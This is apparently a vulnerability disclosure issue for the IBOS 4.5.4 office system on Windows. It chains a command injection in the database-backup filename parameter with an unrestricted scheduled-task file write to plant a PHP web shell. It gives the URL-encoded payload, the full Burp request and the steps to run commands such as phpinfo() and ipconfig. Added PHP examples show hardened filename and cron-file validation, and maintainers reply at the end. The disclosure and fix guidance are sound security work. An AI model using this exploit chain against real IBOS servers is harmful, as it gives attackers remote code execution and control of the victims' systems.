OS: Windows
IBOS version: IBOS 4.5.4 OPEN
This report uses the vulnerability in https://gitee.com/ibos/IBOS/issues/I18IIV
to write a file into a chosen directory, then abuses the scheduled-task editor to turn that file into a web shell.
First, log in to IBOS and enter the management backend.
Use Burp Suite to capture the database-backup request (with method=shell selected), send it to Repeater, and insert the payload into the value of the filename parameter.
The payload is shown below. Every %26 is a URL-encoded &, which cmd.exe treats as a command separator, so the injected tail changes into system/modules/recruit/cron and appends eval($_GET["test"]); to a file named zzzzz there; the trailing &aaa appears to be there so that anything the application adds after the filename ends up in a separate, harmless command.
%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa
The full packet is:
POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1
backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1
Next, open the scheduled-task page and edit the task corresponding to the file generated in step 1, i.e. zzzzz.
In that form, modify the "Task script" content and submit it.
The script can then be run from the same page.
Finally, in Burp Repeater add the test parameter to the request, for example test=phpinfo().
Running a system command works the same way, for example ipconfig.
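The first step relies on the backup filename reaching a shell unescaped. The following PHP is an added illustration written for this page, not IBOS's backup code: it models the shape of I18IIV with a hypothetical command builder (the mysqldump command line and the appended ".sql" suffix are assumptions) and contrasts it with a version that rejects anything other than the name format the application itself generates.

```php
<?php
// Added illustration, not IBOS's backup code. It models the shape of
// I18IIV: with method=shell the user-controlled "filename" is spliced into
// a command line that cmd.exe executes, and cmd.exe treats `&` as a
// command separator. Command layout and ".sql" suffix are assumptions.

// Hypothetical vulnerable builder: raw concatenation.
function buildDumpCommandVulnerable(string $filename): string
{
    return 'mysqldump ibos > ' . $filename . '.sql';
}

// The application itself generates names of the form YYYY-MM-DD_<8 alnum>
// (see 2020-01-17_kRHRRgOk in the packet), so anything else is tampering
// and can be rejected outright.
function isValidBackupName(string $filename): bool
{
    return preg_match('/^\d{4}-\d{2}-\d{2}_[A-Za-z0-9]{8}$/', $filename) === 1;
}

// Hardened builder: whitelist first, then escapeshellarg() as a second
// layer so the argument is quoted for the platform shell.
function buildDumpCommandHardened(string $filename): string
{
    if (!isValidBackupName($filename)) {
        throw new InvalidArgumentException('rejected backup filename');
    }
    return 'mysqldump ibos > ' . escapeshellarg($filename . '.sql');
}

// The decoded value of the filename parameter from the packet above
// (%26 -> &, %20 and + -> space).
$injected = '2020-01-17_kRHRRgOk&cd system&cd modules&cd recruit&cd cron'
          . '&echo eval($_GET["test"]);>>zzzzz&aaa';

// Vulnerable: cmd.exe sees a chain of seven commands; the echo appends the
// PHP fragment to system/modules/recruit/cron/zzzzz, and the trailing
// "aaa" swallows the ".sql" the application tacks on.
echo buildDumpCommandVulnerable($injected), PHP_EOL;

// Hardened: the tampered name never reaches the shell.
try {
    buildDumpCommandHardened($injected);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
echo buildDumpCommandHardened('2020-01-17_kRHRRgOk'), PHP_EOL;
```

The whitelist is the real control here; escapeshellarg() alone would also neutralise the `&`, but a value that the application generated itself should never be accepted back from the client in any other shape.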
The vulnerable file is /system/modules/dashboard/controllers/CronController.php, and the function in question is actionIndex(), starting at line 16.
At line 40, getRealCronFile() assembles the complete file path, and lines 41 to 47 hold the string filtering applied to the file name when a scheduled task is modified; see the getRealCronFile() function code.
In that code the save directory and the base name of the file are constrained, but the file suffix is not, so files of arbitrary type can be written, and combined with another vulnerability (here, the file write above) this yields a shell.
Fix: the function should only accept files of a specific type in the designated directory, or a fixed list of files.
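To make the fix concrete, the following PHP is an added example written for this page, not IBOS's getRealCronFile(). The vulnerable variant is only a guess at the shape of the original filter (path separators stripped, suffix ignored); the hardened variant adds the missing suffix check and a strict whitelist. The directory layout system/modules/<module>/cron/ is taken from the exploit above; the root path and the file names used in the demo are constructed.

```php
<?php
// Added illustration, not IBOS's getRealCronFile(). It contrasts the
// check the report describes (directory and base name constrained, suffix
// not) with a version that also enforces the suffix. The directory layout
// system/modules/<module>/cron/ is taken from the exploit above; the
// filter in the vulnerable variant is a guess at its shape, not the
// original code.

function cronDirFor(string $root, string $module): string
{
    return $root . '/system/modules/' . $module . '/cron/';
}

// Vulnerable shape: traversal characters are stripped, so the path stays
// under the module's cron directory, but "zzzzz" (no .php) is accepted.
function getRealCronFileVulnerable(string $root, string $module, string $file): string
{
    $module = preg_replace('/[^A-Za-z0-9_]/', '', $module);
    $file   = str_replace(['..', '/', '\\', "\0"], '', $file);
    return cronDirFor($root, $module) . $file;
}

// Hardened shape: strict whitelist on both parts, mandatory .php suffix,
// and the directory itself must exist. Because $file cannot contain a
// separator, composing it onto the resolved directory cannot escape it,
// and the function still works when the task file is being created.
function getRealCronFileHardened(string $root, string $module, string $file): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $module)) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        return null; // rejects "zzzzz", "zzzzz.txt", "x.php.bak", "a.PHP"
    }
    $dir = realpath(cronDirFor($root, $module));
    if ($dir === false || !is_dir($dir)) {
        return null; // unknown module or no cron directory
    }
    return $dir . DIRECTORY_SEPARATOR . $file;
}

// Constructed layout in a temp directory, not a real IBOS install.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ibos_cron_demo_' . getmypid();
mkdir($root . '/system/modules/recruit/cron', 0700, true);

$cases = [
    ['recruit', 'zzzzz'],             // the file planted in step 1
    ['recruit', 'zzzzz.php.txt'],     // wrong suffix
    ['recruit', 'Task.php'],          // hypothetical legitimate task
    ['../dashboard', 'Task.php'],     // module traversal attempt
    ['recruit', "Task.php\0.txt"],    // null-byte trick
];
foreach ($cases as [$module, $file]) {
    printf("%-24s vulnerable: %s\n", json_encode($file),
        getRealCronFileVulnerable($root, $module, $file));
    printf("%-24s hardened:   %s\n", json_encode($file),
        getRealCronFileHardened($root, $module, $file) ?? 'REJECTED');
}
```

The point of the suffix rule is that the cron runner will include whatever file the editor lets you save, so restricting the name to `[A-Za-z0-9_]+.php` inside an existing module cron directory closes both the planted-file case from step 1 and any future file-write primitive that lands a differently named file there.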
This issue is an impressive find. A pity IBOS is no longer maintained. Are you from Harbin?
@mahuan I don't normally use it; I only did some security testing on IBOS.
Thanks for submitting the issue. Because of personal health and energy reasons I have long neglected updating this open-source repository, and I apologize to all its users. If you are interested in submitting PRs and maintaining it, you can accept this invitation. https://gitee.com/ibos/IBOS/invite_link?invite=01b415e2534ea3042efc3e1abcb4a556449e1ef86486475c8b40572f73d50c1ed2d883d557bd3e9863ce7e16acfba504